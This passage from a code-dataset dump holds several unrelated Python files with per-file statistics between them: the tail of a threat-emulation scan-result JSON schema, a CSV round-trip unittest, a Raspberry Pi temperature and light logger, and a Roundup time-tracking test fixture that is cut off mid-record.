          "title": "Features",
          "items": {
            "type": "string"
          },
          "order": 5
        },
        "file_name": {
          "type": "string",
          "title": "File Name",
          "order": 4
        },
        "file_type": {
          "type": "string",
          "title": "File Type",
          "order": 3
        },
        "md5": {
          "type": "string",
          "title": "Md5",
          "order": 2
        },
        "status": {
          "$ref": "#/definitions/status",
          "title": "Status",
          "order": 1
        },
        "te": {
          "$ref": "#/definitions/threat_emulation",
          "title": "Te",
          "order": 6
        }
      },
      "definitions": {
        "images": {
          "type": "object",
          "title": "images",
          "properties": {
            "id": {
              "type": "string",
              "title": "Id",
              "order": 3
            },
            "report": {
              "$ref": "#/definitions/report",
              "title": "Report",
              "order": 1
            },
            "revision": {
              "type": "integer",
              "title": "Revision",
              "order": 4
            },
            "status": {
              "type": "string",
              "title": "Status",
              "order": 2
            }
          },
          "definitions": {
            "report": {
              "type": "object",
              "title": "report",
              "properties": {
                "verdict": {
                  "type": "string",
                  "title": "Verdict",
                  "order": 1
                }
              }
            }
          }
        },
        "report": {
          "type": "object",
          "title": "report",
          "properties": {
            "verdict": {
              "type": "string",
              "title": "Verdict",
              "order": 1
            }
          }
        },
        "status": {
          "type": "object",
          "title": "status",
          "properties": {
            "code": {
              "type": "integer",
              "title": "Code",
              "order": 1
            },
            "label": {
              "type": "string",
              "title": "Label",
              "order": 2
            },
            "message": {
              "type": "string",
              "title": "Message",
              "order": 3
            }
          }
        },
        "threat_emulation": {
          "type": "object",
          "title": "threat_emulation",
          "properties": {
            "combined_verdict": {
              "type": "string",
              "title": "Combined Verdict",
              "order": 3
            },
            "images": {
              "type": "array",
              "title": "Images",
              "items": {
                "$ref": "#/definitions/images"
              },
              "order": 2
            },
            "score": {
              "type": "integer",
              "title": "Score",
              "order": 4
            },
            "status": {
              "$ref": "#/definitions/status",
              "title": "Status",
              "order": 5
            },
            "trust": {
              "type": "integer",
              "title": "Trust",
              "order": 1
            }
          },
          "definitions": {
            "images": {
              "type": "object",
              "title": "images",
              "properties": {
                "id": {
                  "type": "string",
                  "title": "Id",
                  "order": 3
                },
                "report": {
                  "$ref": "#/definitions/report",
                  "title": "Report",
                  "order": 1
                },
                "revision": {
                  "type": "integer",
                  "title": "Revision",
                  "order": 4
                },
                "status": {
                  "type": "string",
                  "title": "Status",
                  "order": 2
                }
              },
              "definitions": {
                "report": {
                  "type": "object",
                  "title": "report",
                  "properties": {
                    "verdict": {
                      "type": "string",
                      "title": "Verdict",
                      "order": 1
                    }
                  }
                }
              }
            },
            "report": {
              "type": "object",
              "title": "report",
              "properties": {
                "verdict": {
                  "type": "string",
                  "title": "Verdict",
                  "order": 1
                }
              }
            },
            "status": {
              "type": "object",
              "title": "status",
              "properties": {
                "code": {
                  "type": "integer",
                  "title": "Code",
                  "order": 1
                },
                "label": {
                  "type": "string",
                  "title": "Label",
                  "order": 2
                },
                "message": {
                  "type": "string",
                  "title": "Message",
                  "order": 3
                }
              }
            }
          }
        }
      }
    }
  }
}
  """)

    def __init__(self):
        # Hand the parsed schema to the komand.Output base class.
        super(self.__class__, self).__init__(self.schema)
| 23.524416
| 58
| 0.314982
| 661
| 11,080
| 5.208775
| 0.111952
| 0.095847
| 0.139413
| 0.063898
| 0.812082
| 0.812082
| 0.812082
| 0.763869
| 0.735405
| 0.735405
| 0
| 0.010833
| 0.516787
| 11,080
| 470
| 59
| 23.574468
| 0.632238
| 0.003339
| 0
| 0.679739
| 1
| 0
| 0.959877
| 0.024454
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004357
| false
| 0
| 0.004357
| 0
| 0.030501
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
036113fce85ec1a10b88458b5eac5cad8a658ca0
| 12,850
|
py
|
Python
|
tests/test_csv.py
|
klee229/CS179J-Smart-Water-Station-Project
|
7568c23dc7cd4108ca42c27bf77e18a2a74aa36f
|
[
"MIT"
] | null | null | null |
tests/test_csv.py
|
klee229/CS179J-Smart-Water-Station-Project
|
7568c23dc7cd4108ca42c27bf77e18a2a74aa36f
|
[
"MIT"
] | null | null | null |
tests/test_csv.py
|
klee229/CS179J-Smart-Water-Station-Project
|
7568c23dc7cd4108ca42c27bf77e18a2a74aa36f
|
[
"MIT"
] | 2
|
2021-09-03T20:23:32.000Z
|
2021-11-28T21:49:36.000Z
|
import unittest
import csv
import pandas as pd
class TestCSVFile(unittest.TestCase):
    """Round-trip tests for the user-data CSV file: write, re-read, append, edit.

    NOTE: all items in the fixture data are strings (converted from int or
    float) so that every read compares string-to-string.

    Improvements over the original: the identical ``columns``/``user_data``
    fixtures and the read/write/verify loops were duplicated in four tests —
    they are now shared class attributes and private helpers — and the
    redundant ``csv_file.close()`` calls after ``with`` blocks were removed
    (the context manager already closes the file).
    """

    # NOTE: enter the exact path for your machine to run locally
    # (single place to edit instead of one per test).
    PATH = ''

    # Shared fixture: CSV header used by every test.
    COLUMNS = ['card_uid', 'registration_state', 'name', 'age', 'sex', 'activity_level',
               'daily_hydration_lower', 'daily_hydration_upper', 'water_dispensed', 'total_dispensed',
               'percent_dispensed_of_daily', 'num_days', 'num_days_goal', 'avg_intake', 'last_login'
               ]

    # Shared fixture: six example users for testing.
    USER_DATA = [
        ['734a266f', 'True', 'name one', '5', 'Male', 'Sedentary', '1400', '1600', '0', '100000', '0.0', '1', '0',
         '1517.0', '20/08/2021 05:42:21'],
        ['5d81e96d', 'True', 'name two', '12', 'Female', 'Sedentary', '1600', '2000', '200', '200000', '20.0', '14',
         '12', '1984.0', '11/07/2021 07:15:09'],
        ['4d71f56d', 'True', 'name three', '17', 'Male', 'Moderate', '2400', '2800', '500', '300000', '50.0', '28',
         '19', '1000.0', '20/08/2021 16:58:59'],
        ['fdd1a46b', 'True', 'name four', '29', 'Female', 'Moderate', '2000', '2200', '1300', '400000', '130.0',
         '33', '3', '0.0', '20/08/2021 24:24:24'],
        ['1d4ba46b', 'True', 'name five', '48', 'Male', 'Active', '2400', '2600', '1800', '500000', '180.0', '99',
         '99', '2256.0', '20/08/2021 17:36:10'],
        ['dd8b9f6b', 'True', 'name six', '76', 'Female', 'Active', '1800', '1800', '2400', '600000', '240.0', '257',
         '202', '1234.0', '01/01/1970 00:00:00']
    ]

    def _write_file(self, rows):
        """Overwrite PATH with the header row followed by *rows*."""
        with open(self.PATH, 'w', newline='') as csv_file:
            writer = csv.writer(csv_file)
            writer.writerow(self.COLUMNS)
            writer.writerows(rows)

    def _assert_file_matches(self, rows):
        """Read PATH back and assert the header and every data row equal *rows*."""
        with open(self.PATH, 'r', newline='') as csv_file:
            for row_num, row in enumerate(csv.reader(csv_file)):
                if row_num == 0:
                    self.assertEqual(self.COLUMNS, row)
                else:
                    self.assertEqual(rows[row_num - 1], row)

    def test_open_write_read_close(self):
        """Write the fixture users, then read them back and verify."""
        self._write_file(self.USER_DATA)
        self._assert_file_matches(self.USER_DATA)

    def test_reopen_read_close(self):
        """Re-read a previously written file and verify its contents."""
        self._assert_file_matches(self.USER_DATA)

    def test_add_row(self):
        """Append one user in 'a' mode and verify it can be found by card_uid."""
        example_user = ['1a2b3c4d', 'True', 'Test User', '76', 'Female', 'Active', '2000', '2000', '4000', '900000',
                        '4457.0', '400', '235', '1578.0', '02/12/1970 01:02:03']
        with open(self.PATH, 'a', newline='') as csv_file:
            csv.writer(csv_file).writerow(example_user)
        with open(self.PATH, 'r', newline='') as csv_file:
            new_row = []
            for row in csv.reader(csv_file):
                if row[0] == example_user[0]:
                    new_row = row
        self.assertEqual(example_user, new_row)

    def test_edit_user_data(self):
        """Write the fixture, edit a few cells via pandas, then verify the edits."""
        self._write_file(self.USER_DATA)
        # Locate the CSV row number (header included) of user '734a266f'.
        row_to_change = 0
        with open(self.PATH, 'r', newline='') as csv_file:
            for row_num, row in enumerate(csv.reader(csv_file)):
                if row[0] == '734a266f':
                    row_to_change = row_num
        # Edit through a pandas dataframe; dataframe index N maps to CSV
        # data row N + 1 (the header is not part of the dataframe index).
        df = pd.read_csv(self.PATH)
        df.at[row_to_change - 1, 'num_days'] += 1
        df.at[row_to_change, 'water_dispensed'] += 500
        df.at[row_to_change + 1, 'activity_level'] = 'Moderate'
        temp_water_dispensed = df.at[row_to_change, 'water_dispensed']
        temp_water_dispensed += 1000
        df.at[row_to_change, 'water_dispensed'] = temp_water_dispensed
        df.to_csv(self.PATH, index=False)
        # Expected result: user one's num_days 1 -> 2; user two's
        # water_dispensed 200 -> 1700 (+500, then +1000); user three's
        # activity_level was already 'Moderate'.
        edited_user_data = [list(row) for row in self.USER_DATA]
        edited_user_data[0][11] = '2'
        edited_user_data[1][8] = '1700'
        self._assert_file_matches(edited_user_data)

    def test_open_write_empty_read_close(self):
        """Write rows of empty strings and verify they round-trip unchanged."""
        empty_rows = [[''] * len(self.COLUMNS) for _ in range(6)]
        self._write_file(empty_rows)
        self._assert_file_matches(empty_rows)

    def test_file_initialization_for_boot_up(self):
        """Write the unregistered-user boot-up rows and verify them."""
        boot_rows = [
            [uid, 'False', ' ', '0', ' ', ' ', '0', '0', '0', '0', '0.0', '0', '0', '0.0', ' ']
            for uid in ('734a266f', '5d81e96d', '4d71f56d', 'fdd1a46b', '1d4ba46b', 'dd8b9f6b')
        ]
        self._write_file(boot_rows)
        self._assert_file_matches(boot_rows)
# Run the whole test suite when this module is executed directly.
if __name__ == '__main__':
    unittest.main()
| 45.40636
| 120
| 0.481245
| 1,546
| 12,850
| 3.85705
| 0.129366
| 0.022807
| 0.027168
| 0.032199
| 0.87456
| 0.871373
| 0.866007
| 0.857622
| 0.857622
| 0.857622
| 0
| 0.154779
| 0.313697
| 12,850
| 282
| 121
| 45.567376
| 0.521374
| 0.083346
| 0
| 0.73913
| 0
| 0
| 0.285824
| 0.028931
| 0
| 0
| 0
| 0
| 0.05314
| 1
| 0.028986
| false
| 0
| 0.014493
| 0
| 0.048309
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0377ea243b69ee749031fa3206a18401ccb44a0f
| 3,470
|
py
|
Python
|
scripts_gpio/therm.py
|
BertrandFreylin/WeatherStation
|
4ab6f5af2af02a83c109ecb79498e4c92e5af5d2
|
[
"Apache-2.0"
] | null | null | null |
scripts_gpio/therm.py
|
BertrandFreylin/WeatherStation
|
4ab6f5af2af02a83c109ecb79498e4c92e5af5d2
|
[
"Apache-2.0"
] | null | null | null |
scripts_gpio/therm.py
|
BertrandFreylin/WeatherStation
|
4ab6f5af2af02a83c109ecb79498e4c92e5af5d2
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
import ADC0834
import time
import math
def setup_files(number_of_lines):
    """Trim the two rolling data CSVs down to at most *number_of_lines* lines.

    Called at start-up so the graphs only ever show the most recent
    ``number_of_lines`` samples; the oldest lines are dropped from the
    top of each file.
    """
    _trim_csv('/home/bertrand/workspace/rasp/static/data/therm_inside.csv', number_of_lines)
    _trim_csv('/home/bertrand/workspace/rasp/static/data/photo.csv', number_of_lines)
    return


def _trim_csv(path, number_of_lines):
    # Drop the oldest lines from *path* so it holds at most number_of_lines.
    # Count with a context manager — the original `sum(1 for line in open(...))`
    # leaked the file handle.
    with open(path) as counted:
        num_lines = sum(1 for _ in counted)
    if num_lines > number_of_lines:
        to_delete = int(num_lines - number_of_lines)
        with open(path, 'r') as fin:
            data = fin.read().splitlines(True)
        # Rewrite the file keeping only the newest lines; the with-blocks
        # close the handles (the original's fin.close()/fout.close() after
        # the with-blocks were redundant).
        with open(path, 'w') as fout:
            fout.writelines(data[to_delete:])
def main(number_of_lines, date):
    """Take one temperature and one luminosity sample and log them.

    Each value is appended (timestamped with *date*) to its rolling CSV —
    trimmed to *number_of_lines* lines — and to its unbounded ``*_total``
    CSV.
    """
    # Thermistor on ADC channel 0: ADC count -> voltage -> resistance ->
    # temperature via the B-parameter equation (B = 3950, 10k @ 25 °C).
    temp_val_raw = ADC0834.getResult(0)
    Vr = 5 * float(temp_val_raw) / 255
    Rt = 10000 * Vr / (5 - Vr)
    temp = 1 / (((math.log(Rt / 10000)) / 3950) + (1 / (273.15 + 25)))
    temp_val = round(temp - 273.15)
    # Let the ADC settle between the two channel reads.
    time.sleep(1)
    # Photoresistor on channel 2; invert so brighter light gives a larger value.
    lum_val = round((ADC0834.getResult(2) * -1) + 255)

    _append_and_trim('/home/bertrand/workspace/rasp/static/data/therm_inside.csv',
                     date, temp_val, number_of_lines)
    _append_row('/home/bertrand/workspace/rasp/static/data/therm_inside_total.csv',
                date, temp_val)
    _append_and_trim('/home/bertrand/workspace/rasp/static/data/photo.csv',
                     date, lum_val, number_of_lines)
    _append_row('/home/bertrand/workspace/rasp/static/data/photo_total.csv',
                date, lum_val)
    return


def _append_row(path, date, value):
    # Append one "date,value" line; the with-block flushes and closes.
    with open(path, "a+") as out:
        out.write("%s,%s\n" % (date, value))


def _append_and_trim(path, date, value, number_of_lines):
    # Append, then cap the rolling file at number_of_lines by dropping the
    # oldest line. Closing the append handle before counting fixes the
    # original's bug of counting lines while its buffered append handle was
    # still open (the new line could be unflushed and missed).
    _append_row(path, date, value)
    with open(path) as counted:
        num_lines = sum(1 for _ in counted)
    if num_lines > number_of_lines:
        with open(path, 'r') as fin:
            data = fin.read().splitlines(True)
        with open(path, 'w') as fout:
            fout.writelines(data[1:])
def destroy():
    """Shutdown hook: touch every data CSV so each exists and is closed cleanly."""
    data_files = (
        "/home/bertrand/workspace/rasp/static/data/therm_inside.csv",
        "/home/bertrand/workspace/rasp/static/data/therm_inside_total.csv",
        "/home/bertrand/workspace/rasp/static/data/photo.csv",
        "/home/bertrand/workspace/rasp/static/data/photo_total.csv",
    )
    for data_file in data_files:
        # "a+" creates the file if it does not exist; the context manager
        # closes it immediately, matching the original open()/close() pairs.
        with open(data_file, "a+"):
            pass
    return
| 44.487179
| 106
| 0.665994
| 507
| 3,470
| 4.390533
| 0.149901
| 0.071878
| 0.143756
| 0.224618
| 0.86478
| 0.86478
| 0.86478
| 0.831536
| 0.820755
| 0.820755
| 0
| 0.020622
| 0.175504
| 3,470
| 77
| 107
| 45.064935
| 0.757427
| 0.006052
| 0
| 0.712121
| 0
| 0
| 0.338167
| 0.323086
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.045455
| 0
| 0.136364
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
30577d70a1c1522176a05c9c572d66e6b86822a0
| 87,419
|
py
|
Python
|
test/user18_time.py
|
time-track-tool/time-track-tool
|
a1c280f32a7766e460c862633b748fa206256f24
|
[
"MIT"
] | null | null | null |
test/user18_time.py
|
time-track-tool/time-track-tool
|
a1c280f32a7766e460c862633b748fa206256f24
|
[
"MIT"
] | 1
|
2019-07-03T13:32:38.000Z
|
2019-07-03T13:32:38.000Z
|
test/user18_time.py
|
time-track-tool/time-track-tool
|
a1c280f32a7766e460c862633b748fa206256f24
|
[
"MIT"
] | 1
|
2019-05-15T16:01:31.000Z
|
2019-05-15T16:01:31.000Z
|
from roundup import date
def import_data_18 (db, user, dep, olo) :
sd = dict (months = 1.0, required_overtime = 1, weekly = 0)
otp = db.overtime_period.filter (None, sd)
assert len (otp) == 1
otp = otp [0]
db.user_dynamic.create \
( hours_fri = 7.5
, hours_sun = 0.0
, hours_wed = 7.75
, vacation_yearly = 25.0
, all_in = 0
, valid_from = date.Date ("2018-10-01.00:00:00")
, durations_allowed = 0
, hours_tue = 7.75
, supp_per_period = 7.0
, weekend_allowed = 0
, hours_mon = 7.75
, hours_thu = 7.75
, vacation_day = 1.0
, booking_allowed = 1
, valid_to = date.Date ("2019-05-01.00:00:00")
, weekly_hours = 38.5
, travel_full = 0
, vacation_month = 1.0
, hours_sat = 0.0
, department = dep
, org_location = olo
, overtime_period = otp
, user = user
, vac_aliq = '1'
)
sd = dict (months = 0.0, required_overtime = 0, weekly = 1)
otp = db.overtime_period.filter (None, sd)
assert len (otp) == 1
otp = otp [0]
db.user_dynamic.create \
( hours_fri = 7.5
, hours_sun = 0.0
, additional_hours = 38.5
, hours_wed = 7.75
, vacation_yearly = 25.0
, all_in = 0
, valid_from = date.Date ("2019-05-01.00:00:00")
, durations_allowed = 0
, hours_tue = 7.75
, weekend_allowed = 0
, hours_mon = 7.75
, hours_thu = 7.75
, vacation_day = 1.0
, booking_allowed = 1
, supp_weekly_hours = 38.5
, valid_to = date.Date ("2019-12-01.00:00:00")
, weekly_hours = 38.5
, travel_full = 0
, vacation_month = 1.0
, hours_sat = 0.0
, department = dep
, org_location = olo
, overtime_period = otp
, user = user
, vac_aliq = '1'
)
vcorr = db.vacation_correction.create \
( user = user
, date = date.Date ('2018-01-01.00:00:00')
, absolute = 1
, days = 7.765
)
ls = db.leave_submission.create \
( user = user
, first_day = date.Date ('2019-05-20.00:00:00')
, last_day = date.Date ('2019-05-20.00:00:00')
, status = '4'
, time_wp = '44'
)
ls = db.leave_submission.create \
( user = user
, first_day = date.Date ('2019-06-28.00:00:00')
, last_day = date.Date ('2019-06-28.00:00:00')
, status = '4'
, time_wp = '44'
)
ls = db.leave_submission.create \
( user = user
, first_day = date.Date ('2019-07-05.00:00:00')
, last_day = date.Date ('2019-07-05.00:00:00')
, status = '4'
, time_wp = '44'
)
ls = db.leave_submission.create \
( user = user
, first_day = date.Date ('2019-08-09.00:00:00')
, last_day = date.Date ('2019-08-16.00:00:00')
, status = '4'
, time_wp = '44'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-01.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, duration = 7.75
, work_location = '5'
, wp = '1'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-02.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '4'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-03.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '4'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-04.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-05.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-06.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '15:00'
, work_location = '1'
, wp = '5'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '1'
, wp = '5'
)
db.time_record.create \
( daily_record = dr
, start = '15:00'
, end = '16:00'
, work_location = '1'
, wp = '6'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-07.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '14:30'
, work_location = '1'
, wp = '4'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '1'
, wp = '5'
)
db.time_record.create \
( daily_record = dr
, start = '14:30'
, end = '16:00'
, work_location = '1'
, wp = '7'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-08.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '14:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '10:00'
, work_location = '1'
, wp = '7'
)
db.time_record.create \
( daily_record = dr
, start = '10:00'
, end = '12:00'
, work_location = '1'
, wp = '8'
)
db.time_record.create \
( daily_record = dr
, start = '14:00'
, end = '16:00'
, work_location = '1'
, wp = '7'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-09.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '14:00'
, work_location = '1'
, wp = '4'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '11:30'
, work_location = '1'
, wp = '5'
)
db.time_record.create \
( daily_record = dr
, start = '11:30'
, end = '12:00'
, work_location = '1'
, wp = '7'
)
db.time_record.create \
( daily_record = dr
, start = '14:00'
, end = '16:00'
, work_location = '1'
, wp = '5'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-10.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '15:00'
, work_location = '2'
, wp = '5'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-11.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-12.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-13.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '5'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '5'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-14.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '17:00'
, work_location = '2'
, wp = '5'
)
db.time_record.create \
( daily_record = dr
, start = '08:30'
, end = '12:00'
, work_location = '2'
, wp = '5'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-15.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '08:15'
, end = '08:45'
, work_location = '2'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '5'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '11:00'
, work_location = '1'
, wp = '5'
)
db.time_record.create \
( daily_record = dr
, start = '16:15'
, end = '16:45'
, work_location = '2'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '11:00'
, end = '12:00'
, work_location = '1'
, wp = '6'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-16.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '14:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '14:00'
, end = '16:00'
, work_location = '1'
, wp = '5'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-17.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '6'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-18.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-19.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, duration = 7.75
, work_location = '5'
, wp = '44'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-21.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '17:30'
, work_location = '2'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '09:30'
, end = '10:30'
, work_location = '2'
, wp = '5'
)
db.time_record.create \
( daily_record = dr
, start = '10:30'
, end = '11:30'
, work_location = '2'
, wp = '4'
)
db.time_record.create \
( daily_record = dr
, start = '11:30'
, end = '12:00'
, work_location = '2'
, wp = '6'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-22.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:30'
, work_location = '2'
, wp = '9'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '11:00'
, work_location = '2'
, wp = '9'
)
db.time_record.create \
( daily_record = dr
, start = '11:00'
, end = '12:00'
, work_location = '2'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '16:30'
, end = '17:00'
, work_location = '2'
, wp = '10'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-23.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '9'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '9'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-24.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '14:30'
, work_location = '1'
, wp = '11'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '11'
)
db.time_record.create \
( daily_record = dr
, start = '16:15'
, end = '16:45'
, work_location = '2'
, wp = '4'
)
db.time_record.create \
( daily_record = dr
, start = '15:30'
, end = '16:00'
, work_location = '1'
, wp = '4'
)
db.time_record.create \
( daily_record = dr
, start = '14:30'
, end = '15:30'
, work_location = '1'
, wp = '9'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-25.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-26.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-27.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '14:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '9'
)
db.time_record.create \
( daily_record = dr
, start = '14:00'
, end = '16:00'
, work_location = '1'
, wp = '9'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-28.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '2'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '09:30'
, end = '12:00'
, work_location = '2'
, wp = '9'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-29.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '1'
, wp = '6'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-30.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, duration = 7.75
, work_location = '5'
, wp = '1'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-31.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '11:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '11:00'
, end = '12:00'
, work_location = '1'
, wp = '12'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-01.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-02.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-03.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '15:30'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '11:00'
, work_location = '1'
, wp = '4'
)
db.time_record.create \
( daily_record = dr
, start = '11:00'
, end = '12:00'
, work_location = '1'
, wp = '13'
)
db.time_record.create \
( daily_record = dr
, start = '15:30'
, end = '16:00'
, work_location = '1'
, wp = '13'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-04.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '09:30'
, end = '13:30'
, work_location = '2'
, wp = '13'
)
db.time_record.create \
( daily_record = dr
, start = '13:30'
